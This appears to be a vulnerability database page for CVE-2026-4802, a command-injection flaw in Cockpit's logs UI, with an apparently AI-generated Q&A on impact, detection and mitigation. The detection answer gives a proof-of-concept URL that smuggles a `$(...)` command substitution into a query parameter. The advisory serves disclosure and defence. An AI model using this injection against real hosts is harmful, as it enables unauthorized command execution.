CVE-2026-4802
Arbitrary Command Execution in Cockpit
Publication date: 2026-05-11
Last updated on: 2026-05-11
Assigner: Red Hat, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cockpit_project | cockpit | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-4802 is a vulnerability in the Cockpit project's system logs user interface (UI) that allows a remote attacker to execute arbitrary commands on the host system.
The flaw exists because user-controlled parameters in crafted links are passed unsanitized to a shell command constructed in the logs UI code. Specifically, the vulnerability arises in the `loadServiceFilters()` function of the `logsJournal.jsx` file, where these parameters are joined into a command string and executed via `/bin/bash -ec` without proper sanitization.
An attacker can inject shell metacharacters and command substitutions (like `$(...)`) into these parameters, which leads to arbitrary shell command execution on the affected system.
A proof-of-concept demonstrated this by executing the `id` command and writing its output to a file, confirming remote code execution capability.
How can this vulnerability impact me? :
This vulnerability can lead to a complete system compromise because it allows remote attackers to execute arbitrary shell commands on the host system.
An attacker exploiting this flaw could gain unauthorized control over the affected system, potentially leading to data theft, system disruption, installation of malware, or further attacks within the network.
Since the vulnerability is remotely exploitable via the Cockpit system logs UI, any exposed or accessible Cockpit interface could be targeted.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to exploit the unsanitized user-controlled parameters in the Cockpit system logs UI. Specifically, crafted URLs with shell metacharacters or command substitutions can be used to test if arbitrary commands are executed on the host.
A proof-of-concept involves injecting a command such as `id` via the URL parameters and checking for its output on the system, for example by verifying the presence of a file like `/tmp/cockpit-rce-proof` created by the injected command.
Since the vulnerability arises from the `loadServiceFilters()` function executing commands via `/bin/bash -ec` with unsanitized input, you can test by crafting a URL similar to: `http://<cockpit-host>/#/system/logs#/?since=$(id > /tmp/cockpit-rce-proof)` and then checking if the file `/tmp/cockpit-rce-proof` exists on the system.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the Cockpit system logs UI to trusted users only, as the vulnerability requires access to the Cockpit interface.
Until a patch is released, avoid clicking or following untrusted or suspicious links containing parameters in the system logs UI that could be crafted to exploit this vulnerability.
Monitor for unusual files or command execution traces on the system, such as unexpected files like `/tmp/cockpit-rce-proof`, which may indicate exploitation attempts.
Apply the official patch or update Cockpit to a version where this vulnerability is fixed as soon as it becomes available.